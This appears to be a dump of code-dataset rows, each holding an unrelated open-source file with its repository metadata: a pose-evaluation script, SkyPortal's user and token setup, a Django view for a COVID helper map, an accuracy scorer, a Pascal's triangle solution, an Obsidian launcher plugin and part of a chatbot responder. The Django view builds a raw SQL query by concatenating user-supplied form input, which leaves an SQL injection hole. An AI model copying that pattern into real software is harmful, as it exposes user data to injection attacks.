mse_each_joint = np.linalg.norm(pose2d_pred[:,:,0:2].cpu().numpy() - pose2d_gt[:,:,0:2].numpy(), axis=2) * pose_valid # b x 42
mse2d_lst += mse_each_joint.sum(axis=0)
visibility_lst += pose_valid.sum(axis=0)
for th_idx in range(len(th2d_lst)):
PCK2d_lst[th_idx] += np.sum((mse_each_joint < th2d_lst[th_idx]) * pose_valid)
period = min(len(data_loader), 10)
if i % (len(data_loader)//period) == 0:
print("[Evaluation]{}% finished.".format(period * i // (len(data_loader)//period)))
#if i == 10:break
print('Evaluation spent {:.2f} s\tfps: {:.1f} {:.4f}'.format(time.time()-start_time, infer_time[0]/infer_time[1], infer_time[1]/infer_time[0]))
mse2d_lst /= visibility_lst
PCK2d_lst /= visibility_lst.sum()
result_dir = record_prefix+cfg.EXP_NAME
if not os.path.exists(result_dir):
os.mkdir(result_dir)
mse_file, pck_file = os.path.join(result_dir, 'mse2d_each_joint.txt'), os.path.join(result_dir, 'PCK2d.txt')
print('Saving results to ' + mse_file)
print('Saving results to ' + pck_file)
np.savetxt(mse_file, mse2d_lst, fmt='%.4f')
np.savetxt(pck_file, np.stack((th2d_lst, PCK2d_lst)))
plot_performance(PCK2d_lst, th2d_lst, mse2d_lst, hand_type='interacting')
main() | en | 0.137781 | 1.799983 | 2 |
skyportal/model_util.py | jadalilleboe/skyportal | 1 | 13550 | from social_tornado.models import TornadoStorage
from skyportal.models import DBSession, ACL, Role, User, Token, Group
from skyportal.enum_types import LISTENER_CLASSES, sqla_enum_types
from baselayer.app.env import load_env
all_acl_ids = [
'Become user',
'Comment',
'Annotate',
'Manage users',
'Manage sources',
'Manage groups',
'Manage shifts',
'Manage allocations',
'Manage observing runs',
'Upload data',
'System admin',
'Post taxonomy',
'Delete taxonomy',
'Classify',
] + [c.get_acl_id() for c in LISTENER_CLASSES]
role_acls = {
'Super admin': all_acl_ids,
'Group admin': [
'Annotate',
'Comment',
'Manage shifts',
'Manage sources',
'Upload data',
'Post taxonomy',
'Manage users',
'Classify',
'Manage observing runs',
],
'Full user': [
'Annotate',
'Comment',
'Upload data',
'Classify',
'Manage observing runs',
],
'View only': [],
}
env, cfg = load_env()
def add_user(username, roles=[], auth=False, first_name=None, last_name=None):
user = User.query.filter(User.username == username).first()
if user is None:
user = User(username=username, first_name=first_name, last_name=last_name)
if auth:
TornadoStorage.user.create_social_auth(user, user.username, 'google-oauth2')
for rolename in roles:
role = Role.query.get(rolename)
if role not in user.roles:
user.roles.append(role)
DBSession().add(user)
DBSession().flush()
# Add user to sitewide public group
public_group = Group.query.filter(
Group.name == cfg["misc"]["public_group_name"]
).first()
if public_group is None:
public_group = Group(name=cfg["misc"]["public_group_name"])
DBSession().add(public_group)
DBSession().flush()
user.groups.append(public_group)
DBSession().commit()
return User.query.filter(User.username == username).first()
def refresh_enums():
for type in sqla_enum_types:
for key in type.enums:
DBSession().execute(
f"ALTER TYPE {type.name} ADD VALUE IF NOT EXISTS '{key}'"
)
DBSession().commit()
def make_super_user(username):
"""Initializes a super user with full permissions."""
setup_permissions() # make sure permissions already exist
add_user(username, roles=['Super admin'], auth=True)
def provision_token():
"""Provision an initial administrative token."""
admin = add_user(
'provisioned_admin',
roles=['Super admin'],
first_name="provisioned",
last_name="admin",
)
token_name = 'Initial <PASSWORD> token'
token = (
Token.query.filter(Token.created_by == admin).filter(Token.name == token_name)
).first()
if token is None:
token_id = create_token(all_acl_ids, user_id=admin.id, name=token_name)
token = Token.query.get(token_id)
return token
def provision_public_group():
"""If public group name is set in the config file, create it."""
env, cfg = load_env()
public_group_name = cfg['misc.public_group_name']
if public_group_name:
pg = Group.query.filter(Group.name == public_group_name).first()
if pg is None:
DBSession().add(Group(name=public_group_name))
DBSession().commit()
def setup_permissions():
"""Create default ACLs/Roles needed by application.
If a given ACL or Role already exists, it will be skipped."""
all_acls = [ACL.create_or_get(a) for a in all_acl_ids]
DBSession().add_all(all_acls)
DBSession().commit()
for r, acl_ids in role_acls.items():
role = Role.create_or_get(r)
role.acls = [ACL.query.get(a) for a in acl_ids]
DBSession().add(role)
DBSession().commit()
def create_token(ACLs, user_id, name):
t = Token(permissions=ACLs, name=name)
u = User.query.get(user_id)
u.tokens.append(t)
t.created_by = u
DBSession().add(u)
DBSession().add(t)
DBSession().commit()
return t.id
def delete_token(token_id):
t = Token.query.get(token_id)
if DBSession().query(Token).filter(Token.id == token_id).first():
DBSession().delete(t)
DBSession().commit()
| from social_tornado.models import TornadoStorage
from skyportal.models import DBSession, ACL, Role, User, Token, Group
from skyportal.enum_types import LISTENER_CLASSES, sqla_enum_types
from baselayer.app.env import load_env
all_acl_ids = [
'Become user',
'Comment',
'Annotate',
'Manage users',
'Manage sources',
'Manage groups',
'Manage shifts',
'Manage allocations',
'Manage observing runs',
'Upload data',
'System admin',
'Post taxonomy',
'Delete taxonomy',
'Classify',
] + [c.get_acl_id() for c in LISTENER_CLASSES]
role_acls = {
'Super admin': all_acl_ids,
'Group admin': [
'Annotate',
'Comment',
'Manage shifts',
'Manage sources',
'Upload data',
'Post taxonomy',
'Manage users',
'Classify',
'Manage observing runs',
],
'Full user': [
'Annotate',
'Comment',
'Upload data',
'Classify',
'Manage observing runs',
],
'View only': [],
}
env, cfg = load_env()
def add_user(username, roles=[], auth=False, first_name=None, last_name=None):
user = User.query.filter(User.username == username).first()
if user is None:
user = User(username=username, first_name=first_name, last_name=last_name)
if auth:
TornadoStorage.user.create_social_auth(user, user.username, 'google-oauth2')
for rolename in roles:
role = Role.query.get(rolename)
if role not in user.roles:
user.roles.append(role)
DBSession().add(user)
DBSession().flush()
# Add user to sitewide public group
public_group = Group.query.filter(
Group.name == cfg["misc"]["public_group_name"]
).first()
if public_group is None:
public_group = Group(name=cfg["misc"]["public_group_name"])
DBSession().add(public_group)
DBSession().flush()
user.groups.append(public_group)
DBSession().commit()
return User.query.filter(User.username == username).first()
def refresh_enums():
for type in sqla_enum_types:
for key in type.enums:
DBSession().execute(
f"ALTER TYPE {type.name} ADD VALUE IF NOT EXISTS '{key}'"
)
DBSession().commit()
def make_super_user(username):
"""Initializes a super user with full permissions."""
setup_permissions() # make sure permissions already exist
add_user(username, roles=['Super admin'], auth=True)
def provision_token():
"""Provision an initial administrative token."""
admin = add_user(
'provisioned_admin',
roles=['Super admin'],
first_name="provisioned",
last_name="admin",
)
token_name = 'Initial <PASSWORD> token'
token = (
Token.query.filter(Token.created_by == admin).filter(Token.name == token_name)
).first()
if token is None:
token_id = create_token(all_acl_ids, user_id=admin.id, name=token_name)
token = Token.query.get(token_id)
return token
def provision_public_group():
"""If public group name is set in the config file, create it."""
env, cfg = load_env()
public_group_name = cfg['misc.public_group_name']
if public_group_name:
pg = Group.query.filter(Group.name == public_group_name).first()
if pg is None:
DBSession().add(Group(name=public_group_name))
DBSession().commit()
def setup_permissions():
"""Create default ACLs/Roles needed by application.
If a given ACL or Role already exists, it will be skipped."""
all_acls = [ACL.create_or_get(a) for a in all_acl_ids]
DBSession().add_all(all_acls)
DBSession().commit()
for r, acl_ids in role_acls.items():
role = Role.create_or_get(r)
role.acls = [ACL.query.get(a) for a in acl_ids]
DBSession().add(role)
DBSession().commit()
def create_token(ACLs, user_id, name):
t = Token(permissions=ACLs, name=name)
u = User.query.get(user_id)
u.tokens.append(t)
t.created_by = u
DBSession().add(u)
DBSession().add(t)
DBSession().commit()
return t.id
def delete_token(token_id):
t = Token.query.get(token_id)
if DBSession().query(Token).filter(Token.id == token_id).first():
DBSession().delete(t)
DBSession().commit()
| pt | 0.139462 | 2.07689 | 2 |
pages/views.py | SmartDataWithR/CovidHelper | 0 | 13551 | <filename>pages/views.py
from django.views.generic import TemplateView
from ipware import get_client_ip
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.conf import settings
from .forms import SearchForm
from users.models import CustomUser
import geopy
from geopy.distance import geodesic
import pandas as pd
import json
from django.utils.translation import gettext as _, activate
# required for IP to numeric
import socket
import struct
# import file for ip's to language mapping
df_ip_lang = pd.read_csv('pages/lng_map.csv', names=['ip_from', 'ip_to', 'country_code', 'country_name', 'lang_code'] )
def ip(request):
ip, is_routable = get_client_ip(request)
if ip is None:
ip = "0.0.0.0"
else:
if is_routable:
ipv = "Public"
else:
ipv = "Private"
return (ip, ipv)
def ip2int(addr):
return struct.unpack("!I", socket.inet_aton(addr))[0]
def index(request):
search = request.POST.get('search-field')
searchCat = request.POST.get('search-catogery')
locator = geopy.Nominatim(user_agent="myGeocoder")
gotodiv = False
# From IP to Language
#--------------------
request_ip = ip(request) # get request IP
request_ip_int = ip2int(request_ip[0]) # convert IP to numeric
df_filt = df_ip_lang[df_ip_lang.ip_from <= request_ip_int] # filter data for fetched ip
range_to_check = df_filt.iloc[-1]
is_in_range = request_ip_int > range_to_check.ip_from & request_ip_int < range_to_check.ip_to # check that my IP is in range
country_code = 'en-us' # initialise default language
if is_in_range: # if an entry is found in dataframe, set this one to country-code
country_code = range_to_check.lang_code
activate(country_code) # activate the current language code
current_path = str(request.get_full_path()).strip('/')
print(current_path)
# if user selected a language manually, use this one
if current_path == 'en':
activate('en-us')
elif current_path != '':
activate(current_path)
context = {}
if search != None:
location = locator.geocode(search, timeout=5)
if not hasattr(location, 'longitude'):
location = locator.geocode('Hamburg', timeout=5)
# get result for 'All' (Category 4)
if searchCat == '4':
sql_q = 'SELECT * FROM users_customuser'
else:
sql_q = 'SELECT * FROM users_customuser WHERE group_membership like ' + searchCat
print(sql_q)
#query = 'SELECT * FROM users_customuser'
#if search != None and searchCat == '4':
#df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type] for u in CustomUser.objects.raw('SELECT * FROM users_customuser') )
#query = 'SELECT * FROM users_customuser'
#else:
#df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type] for u in CustomUser.objects.raw('SELECT * FROM users_customuser WHERE group_membership = searchCat') )
#query = 'SELECT * FROM users_customuser WHERE group_membership = '.searchCat
# df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url] for u in CustomUser.objects.raw('SELECT * FROM users_customuser WHERE group_membership IN(SELECT group_membership FROM users_customuser WHERE (%s<>'' AND group_membership IN('0','1','3')) OR (%s<>'' AND group_membership=group_membership))', [searchCat]) )
#df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url] for u in CustomUser.objects.raw('SELECT * FROM users_customuser WHERE group_membership IN(SELECT group_membership FROM users_customuser WHERE (%s <> NULL AND group_membership IN('0','1','3')) OR (group_membership = group_membership))', [searchCat]) )
df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url, u.shop_type] for u in CustomUser.objects.raw(sql_q) )
df.columns = ['id','group_membership', 'longitude', 'latitude', 'slogan', 'zip_code', 'description', 'map_show_location', 'username', 'help_type', 'userImg_Url', 'shop_type']
df['distance'] = [geodesic((location.longitude, location.latitude), (x, y)).miles for x,y in zip(df['longitude'], df['latitude'])]
# filter for distance max 20km (12.4miles)
df_filt = df[df['distance'] < 12.4]
print(df_filt)
# pass the data to the template
group_membership = df_filt['group_membership'].values.tolist()
group_membership = [int(x) for x in group_membership]
help_type = df_filt['help_type'].values.tolist()
userImg_Url = df_filt['userImg_Url'].values.tolist()
slogan = df_filt['slogan'].values.tolist()
shop_type = df_filt['shop_type'].values.tolist()
description = df_filt['description'].values.tolist()
username = df_filt['username'].values.tolist()
zipcode = df_filt['zip_code'].values.tolist()
#tel_private = df_filt['tel_private'].values.tolist()
#tel_mobile = df_filt['tel_mobile'].values.tolist()
longitudes = df_filt['longitude'].values.tolist()
latitudes = df_filt['latitude'].values.tolist()
ids = df_filt['id'].values.tolist()
map_show_location = df_filt['map_show_location'].values.tolist()
map_show_location = [int(x) for x in map_show_location]
rname = list(range(0, len(ids)))
template_table = list(zip(rname, ids, slogan, description, zipcode))
gotodiv = 'search'
context = {'longitude': location.longitude, 'latitude': location.latitude,'id':ids, 'userImg_Url':userImg_Url, 'group_membership': group_membership, 'longitudes': longitudes, 'latitudes': latitudes, 'slogan': slogan, 'description': description, 'gotodiv': gotodiv, 'map_show_location':map_show_location, 'template_table':template_table, 'username':username, 'help_type':help_type}
return render(request, 'pages/home.html', context)
class HomePageView(TemplateView):
template_name = 'pages/home.html'
class AboutPageView(TemplateView):
template_name = 'pages/about.html'
def searchLocation(request):
form = SearchForm(request)
print(form)
if request.method=='POST':
form = SearchForm(request.POST)
return render(request, 'pages/home.html', {'form': form})
def change_password(request):
if request.method == 'POST':
form = PasswordChangeForm(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user) # Important!
messages.success(request, 'Your password was successfully updated!')
return redirect('change_password')
else:
messages.error(request, 'Please correct the error below.')
else:
form = PasswordChangeForm(request.user)
return render(request, 'account/password_set.html', {
'form': form
})
def privacy(request):
return render(request, 'pages/privacy.html')
def imprint(request):
return render(request, 'pages/imprint.html')
def terms(request):
return render(request, 'pages/terms_conditions.html')
def cookie_policy(request):
return render(request, 'pages/cookie_policy.html')
| <filename>pages/views.py
from django.views.generic import TemplateView
from ipware import get_client_ip
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.conf import settings
from .forms import SearchForm
from users.models import CustomUser
import geopy
from geopy.distance import geodesic
import pandas as pd
import json
from django.utils.translation import gettext as _, activate
# required for IP to numeric
import socket
import struct
# import file for ip's to language mapping
df_ip_lang = pd.read_csv('pages/lng_map.csv', names=['ip_from', 'ip_to', 'country_code', 'country_name', 'lang_code'] )
def ip(request):
ip, is_routable = get_client_ip(request)
if ip is None:
ip = "0.0.0.0"
else:
if is_routable:
ipv = "Public"
else:
ipv = "Private"
return (ip, ipv)
def ip2int(addr):
return struct.unpack("!I", socket.inet_aton(addr))[0]
def index(request):
search = request.POST.get('search-field')
searchCat = request.POST.get('search-catogery')
locator = geopy.Nominatim(user_agent="myGeocoder")
gotodiv = False
# From IP to Language
#--------------------
request_ip = ip(request) # get request IP
request_ip_int = ip2int(request_ip[0]) # convert IP to numeric
df_filt = df_ip_lang[df_ip_lang.ip_from <= request_ip_int] # filter data for fetched ip
range_to_check = df_filt.iloc[-1]
is_in_range = request_ip_int > range_to_check.ip_from & request_ip_int < range_to_check.ip_to # check that my IP is in range
country_code = 'en-us' # initialise default language
if is_in_range: # if an entry is found in dataframe, set this one to country-code
country_code = range_to_check.lang_code
activate(country_code) # activate the current language code
current_path = str(request.get_full_path()).strip('/')
print(current_path)
# if user selected a language manually, use this one
if current_path == 'en':
activate('en-us')
elif current_path != '':
activate(current_path)
context = {}
if search != None:
location = locator.geocode(search, timeout=5)
if not hasattr(location, 'longitude'):
location = locator.geocode('Hamburg', timeout=5)
# get result for 'All' (Category 4)
if searchCat == '4':
sql_q = 'SELECT * FROM users_customuser'
else:
sql_q = 'SELECT * FROM users_customuser WHERE group_membership like ' + searchCat
print(sql_q)
#query = 'SELECT * FROM users_customuser'
#if search != None and searchCat == '4':
#df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type] for u in CustomUser.objects.raw('SELECT * FROM users_customuser') )
#query = 'SELECT * FROM users_customuser'
#else:
#df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type] for u in CustomUser.objects.raw('SELECT * FROM users_customuser WHERE group_membership = searchCat') )
#query = 'SELECT * FROM users_customuser WHERE group_membership = '.searchCat
# df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url] for u in CustomUser.objects.raw('SELECT * FROM users_customuser WHERE group_membership IN(SELECT group_membership FROM users_customuser WHERE (%s<>'' AND group_membership IN('0','1','3')) OR (%s<>'' AND group_membership=group_membership))', [searchCat]) )
#df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url] for u in CustomUser.objects.raw('SELECT * FROM users_customuser WHERE group_membership IN(SELECT group_membership FROM users_customuser WHERE (%s <> NULL AND group_membership IN('0','1','3')) OR (group_membership = group_membership))', [searchCat]) )
df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url, u.shop_type] for u in CustomUser.objects.raw(sql_q) )
df.columns = ['id','group_membership', 'longitude', 'latitude', 'slogan', 'zip_code', 'description', 'map_show_location', 'username', 'help_type', 'userImg_Url', 'shop_type']
df['distance'] = [geodesic((location.longitude, location.latitude), (x, y)).miles for x,y in zip(df['longitude'], df['latitude'])]
# filter for distance max 20km (12.4miles)
df_filt = df[df['distance'] < 12.4]
print(df_filt)
# pass the data to the template
group_membership = df_filt['group_membership'].values.tolist()
group_membership = [int(x) for x in group_membership]
help_type = df_filt['help_type'].values.tolist()
userImg_Url = df_filt['userImg_Url'].values.tolist()
slogan = df_filt['slogan'].values.tolist()
shop_type = df_filt['shop_type'].values.tolist()
description = df_filt['description'].values.tolist()
username = df_filt['username'].values.tolist()
zipcode = df_filt['zip_code'].values.tolist()
#tel_private = df_filt['tel_private'].values.tolist()
#tel_mobile = df_filt['tel_mobile'].values.tolist()
longitudes = df_filt['longitude'].values.tolist()
latitudes = df_filt['latitude'].values.tolist()
ids = df_filt['id'].values.tolist()
map_show_location = df_filt['map_show_location'].values.tolist()
map_show_location = [int(x) for x in map_show_location]
rname = list(range(0, len(ids)))
template_table = list(zip(rname, ids, slogan, description, zipcode))
gotodiv = 'search'
context = {'longitude': location.longitude, 'latitude': location.latitude,'id':ids, 'userImg_Url':userImg_Url, 'group_membership': group_membership, 'longitudes': longitudes, 'latitudes': latitudes, 'slogan': slogan, 'description': description, 'gotodiv': gotodiv, 'map_show_location':map_show_location, 'template_table':template_table, 'username':username, 'help_type':help_type}
return render(request, 'pages/home.html', context)
class HomePageView(TemplateView):
template_name = 'pages/home.html'
class AboutPageView(TemplateView):
template_name = 'pages/about.html'
def searchLocation(request):
form = SearchForm(request)
print(form)
if request.method=='POST':
form = SearchForm(request.POST)
return render(request, 'pages/home.html', {'form': form})
def change_password(request):
if request.method == 'POST':
form = PasswordChangeForm(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user) # Important!
messages.success(request, 'Your password was successfully updated!')
return redirect('change_password')
else:
messages.error(request, 'Please correct the error below.')
else:
form = PasswordChangeForm(request.user)
return render(request, 'account/password_set.html', {
'form': form
})
def privacy(request):
return render(request, 'pages/privacy.html')
def imprint(request):
return render(request, 'pages/imprint.html')
def terms(request):
return render(request, 'pages/terms_conditions.html')
def cookie_policy(request):
return render(request, 'pages/cookie_policy.html')
| pt | 0.149896 | 2.083017 | 2 |
image-classification/evaluate_classification.py | rush2406/vipriors-challenges-toolkit | 56 | 13552 | """
Use this script to evaluate your model. It stores metrics in the file
`scores.txt`.
Input:
predictions (str): filepath. Should be a file that matches the submission
format;
groundtruths (str): filepath. Should be an annotation file.
Usage:
evaluate_classification.py <groundtruths> <predictions> <output_dir>
"""
import numpy as np
import pandas as pd
import os
import sys
OUTPUT_FILE = 'scores.txt'
def evaluate_from_files(groundtruths_filepath, predictions_filepath, output_dir):
output_dir = output_dir
data = pd.read_csv(groundtruths_filepath)
sub_data = pd.read_csv(predictions_filepath)
ground_truth = data.to_numpy()
submission = sub_data.to_numpy()
indexed_gt = {}
for idx in range(len(ground_truth)):
indexed_gt[ground_truth[idx][0]] = ground_truth[idx]
indexed_sbm = {}
for idx in range(len(submission)):
indexed_sbm[submission[idx][0]] = submission[idx]
tp = 0.0
fp = 0.0
for im_idx in indexed_gt:
if im_idx not in indexed_sbm:
continue
if indexed_gt[im_idx][1] == indexed_sbm[im_idx][1]:
tp += 1.
else:
fp += 1.
acc = tp / (tp+fp)
print('accuracy', acc)
metrics = [("Top1 accuracy", acc)]
with open(os.path.join(output_dir, OUTPUT_FILE), 'w') as f:
for name, val in metrics:
f.write(f"{name}: {val:.8f}\n")
print("Metrics written to scores.txt.")
if __name__ == '__main__':
args = sys.argv[1:]
evaluate_from_files(args[0], args[1], args[2]) | """
Use this script to evaluate your model. It stores metrics in the file
`scores.txt`.
Input:
predictions (str): filepath. Should be a file that matches the submission
format;
groundtruths (str): filepath. Should be an annotation file.
Usage:
evaluate_classification.py <groundtruths> <predictions> <output_dir>
"""
import numpy as np
import pandas as pd
import os
import sys
OUTPUT_FILE = 'scores.txt'
def evaluate_from_files(groundtruths_filepath, predictions_filepath, output_dir):
output_dir = output_dir
data = pd.read_csv(groundtruths_filepath)
sub_data = pd.read_csv(predictions_filepath)
ground_truth = data.to_numpy()
submission = sub_data.to_numpy()
indexed_gt = {}
for idx in range(len(ground_truth)):
indexed_gt[ground_truth[idx][0]] = ground_truth[idx]
indexed_sbm = {}
for idx in range(len(submission)):
indexed_sbm[submission[idx][0]] = submission[idx]
tp = 0.0
fp = 0.0
for im_idx in indexed_gt:
if im_idx not in indexed_sbm:
continue
if indexed_gt[im_idx][1] == indexed_sbm[im_idx][1]:
tp += 1.
else:
fp += 1.
acc = tp / (tp+fp)
print('accuracy', acc)
metrics = [("Top1 accuracy", acc)]
with open(os.path.join(output_dir, OUTPUT_FILE), 'w') as f:
for name, val in metrics:
f.write(f"{name}: {val:.8f}\n")
print("Metrics written to scores.txt.")
if __name__ == '__main__':
args = sys.argv[1:]
evaluate_from_files(args[0], args[1], args[2]) | pt | 0.105109 | 2.933514 | 3 |
src/118. Pascal's Triangle.py | rajshrivastava/LeetCode | 1 | 13553 | class Solution:
def generate(self, numRows: int) -> List[List[int]]:
result = [[1]]
for i in range(1, numRows):
temp = [1]
for j in range(1, i):
temp.append(result[-1][j-1] + result[-1][j])
temp.append(1)
result.append(temp)
return result
| class Solution:
def generate(self, numRows: int) -> List[List[int]]:
result = [[1]]
for i in range(1, numRows):
temp = [1]
for j in range(1, i):
temp.append(result[-1][j-1] + result[-1][j])
temp.append(1)
result.append(temp)
return result
| none | 1 | 3.140776 | 3 |
__init__.py | j0rd1smit/obsidian-albert-plugin | 1 | 13554 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""A simple plugin that makes it possible to search your Obsidian vault.
This extension makes it possible to search your Obsidian vault. For more information please visit https://github.com/j0rd1smit/obsidian-albert-plugin.
Synopsis: ob <query>"""
from albert import *
import os
from time import sleep
from pathlib import Path
import sys
import json
__title__ = "Obsidian"
__version__ = "0.0.1"
__triggers__ = "ob "
__authors__ = "J0rd1smit"
__exec_deps__ = []
__py_deps__ = []
PATH_TO_CONFIG_FOLDER = Path.home() / ".config/albert/obsidian-plugin"
PATH_TO_CONFIG_DATA = PATH_TO_CONFIG_FOLDER / "config.json"
PATH_TO_ICON = os.path.dirname(__file__) + "/plugin.png"
iconPath = iconLookup("albert")
def initialize():
PATH_TO_CONFIG_FOLDER.mkdir(parents=True, exist_ok=True)
if not PATH_TO_CONFIG_DATA.exists():
_create_default_config()
def _create_default_config():
with open(PATH_TO_CONFIG_DATA, "w") as f:
data = {
"vault_name": "obsidian",
"path_to_vault": str(Path.home() / "obsidian"),
"commands": [
{
"name": "New note",
"subtext": "Add a new note to the vault",
"uri": "obsidian://new?vault=REPLACE_WITH_VAULT_NAME&name={{q}}"
}
],
}
json.dump(data, f, indent=4)
def handleQuery(query):
if not query.isTriggered:
return
query_text = query.string.lower()
with open(PATH_TO_CONFIG_DATA) as f:
config = json.load(f)
vault_name = config["vault_name"]
path_to_vault = Path(config["path_to_vault"])
commands = config["commands"]
item_ranking_pairs = []
max_ranking = 0
for path in path_to_vault.rglob("*.md"):
item, ranking = create_open_note_item(vault_name, path_to_vault, path, query_text)
max_ranking = max(max_ranking, ranking)
item_ranking_pairs.append((item, ranking))
for command in commands:
item, ranking = create_uri_item(query_text, command)
max_ranking = max(max_ranking, ranking)
item_ranking_pairs.append((item, ranking))
return [item for (item, ranking) in item_ranking_pairs if ranking == max_ranking]
def create_open_note_item(
vault_name,
path_to_vault,
path_to_file,
query,
):
path_rel_to_vault = str(path_to_file).replace(str(path_to_vault), "")
path_rel_to_vault_encoded = to_uri_encoding(path_rel_to_vault)
action = UrlAction(
text="UrlAction",
url=f"obsidian://open?vault={vault_name}&file={path_rel_to_vault_encoded}",
)
item = Item(
id=__title__,
icon=PATH_TO_ICON,
text=path_to_file.name,
subtext=path_rel_to_vault,
actions=[action],
)
return item, _n_matches(path_rel_to_vault, query)
def to_uri_encoding(s):
return s.replace(' ', '%20').replace("/", "%2F")
def _n_matches(key, query):
key = key.lower()
matches = 0
for search_key in query.split(" "):
if search_key in key:
matches += 1
return matches
def create_uri_item(
query,
uri_config,
):
name = uri_config["name"]
subtext = uri_config["subtext"]
uri_template = uri_config["uri"]
q = query.lower()
for i in name.lower().split():
q = q.replace(i, "")
action = UrlAction(
text="UrlAction",
url=uri_template.replace("{{q}}", to_uri_encoding(q)),
)
item = Item(id=__title__,
icon=PATH_TO_ICON,
text=name,
subtext=subtext,
actions=[action],
)
key = name
if len(subtext) > 0:
key = " " + subtext
return item, _n_matches(key, query)
| # -*- coding: utf-8 -*-
"""A simple plugin that makes it possible to search your Obsidian vault.
This extension makes it possible to search your Obsidian vault. For more information please visit https://github.com/j0rd1smit/obsidian-albert-plugin.
Synopsis: ob <query>"""
from albert import *
import os
from time import sleep
from pathlib import Path
import sys
import json
__title__ = "Obsidian"
__version__ = "0.0.1"
__triggers__ = "ob "
__authors__ = "J0rd1smit"
__exec_deps__ = []
__py_deps__ = []
PATH_TO_CONFIG_FOLDER = Path.home() / ".config/albert/obsidian-plugin"
PATH_TO_CONFIG_DATA = PATH_TO_CONFIG_FOLDER / "config.json"
PATH_TO_ICON = os.path.dirname(__file__) + "/plugin.png"
iconPath = iconLookup("albert")
def initialize():
PATH_TO_CONFIG_FOLDER.mkdir(parents=True, exist_ok=True)
if not PATH_TO_CONFIG_DATA.exists():
_create_default_config()
def _create_default_config():
with open(PATH_TO_CONFIG_DATA, "w") as f:
data = {
"vault_name": "obsidian",
"path_to_vault": str(Path.home() / "obsidian"),
"commands": [
{
"name": "New note",
"subtext": "Add a new note to the vault",
"uri": "obsidian://new?vault=REPLACE_WITH_VAULT_NAME&name={{q}}"
}
],
}
json.dump(data, f, indent=4)
def handleQuery(query):
if not query.isTriggered:
return
query_text = query.string.lower()
with open(PATH_TO_CONFIG_DATA) as f:
config = json.load(f)
vault_name = config["vault_name"]
path_to_vault = Path(config["path_to_vault"])
commands = config["commands"]
item_ranking_pairs = []
max_ranking = 0
for path in path_to_vault.rglob("*.md"):
item, ranking = create_open_note_item(vault_name, path_to_vault, path, query_text)
max_ranking = max(max_ranking, ranking)
item_ranking_pairs.append((item, ranking))
for command in commands:
item, ranking = create_uri_item(query_text, command)
max_ranking = max(max_ranking, ranking)
item_ranking_pairs.append((item, ranking))
return [item for (item, ranking) in item_ranking_pairs if ranking == max_ranking]
def create_open_note_item(
vault_name,
path_to_vault,
path_to_file,
query,
):
path_rel_to_vault = str(path_to_file).replace(str(path_to_vault), "")
path_rel_to_vault_encoded = to_uri_encoding(path_rel_to_vault)
action = UrlAction(
text="UrlAction",
url=f"obsidian://open?vault={vault_name}&file={path_rel_to_vault_encoded}",
)
item = Item(
id=__title__,
icon=PATH_TO_ICON,
text=path_to_file.name,
subtext=path_rel_to_vault,
actions=[action],
)
return item, _n_matches(path_rel_to_vault, query)
def to_uri_encoding(s):
return s.replace(' ', '%20').replace("/", "%2F")
def _n_matches(key, query):
key = key.lower()
matches = 0
for search_key in query.split(" "):
if search_key in key:
matches += 1
return matches
def create_uri_item(
query,
uri_config,
):
name = uri_config["name"]
subtext = uri_config["subtext"]
uri_template = uri_config["uri"]
q = query.lower()
for i in name.lower().split():
q = q.replace(i, "")
action = UrlAction(
text="UrlAction",
url=uri_template.replace("{{q}}", to_uri_encoding(q)),
)
item = Item(id=__title__,
icon=PATH_TO_ICON,
text=name,
subtext=subtext,
actions=[action],
)
key = name
if len(subtext) > 0:
key = " " + subtext
return item, _n_matches(key, query) | pt | 0.116388 | 2.900512 | 3 |
py3Server/ClassMate/botResponses.py | GFBryson/myProjects | 1 | 13555 | <reponame>GFBryson/myProjects
class responder():
def resp_hello():
hello=[]
hello.append('Hey there "{usr}"! how\'s it going?')
hello.append('Hi "{usr}" :grinning:')
hello.append('Hello "{usr}", whats up?')
hello.append('Hey "{usr}" :wave:,\nHow are you doing?')
hello.append('Hi "{usr}"!\nI\'m StrugBot, and I\'m super happy to be here!!')
hello.append('Sup "{usr}"!')
hello.append('Hi "{usr}",\nwhat can I do for you?')
hello.append('WAZZZZUUUUUUUUUUUUUUP "{usr}"')
return hello
def resp_trex():
return"I am a T-Rex!:t-rex:\nI have a BIG head and little arms,\nRAWWWRRRRR!!"
def resp_date():
return 'the date is: '
def resp_time():
return 'the time is: '
| class responder():
def resp_hello():
hello=[]
hello.append('Hey there "{usr}"! how\'s it going?')
hello.append('Hi "{usr}" :grinning:')
hello.append('Hello "{usr}", whats up?')
hello.append('Hey "{usr}" :wave:,\nHow are you doing?')
hello.append('Hi "{usr}"!\nI\'m StrugBot, and I\'m super happy to be here!!')
hello.append('Sup "{usr}"!')
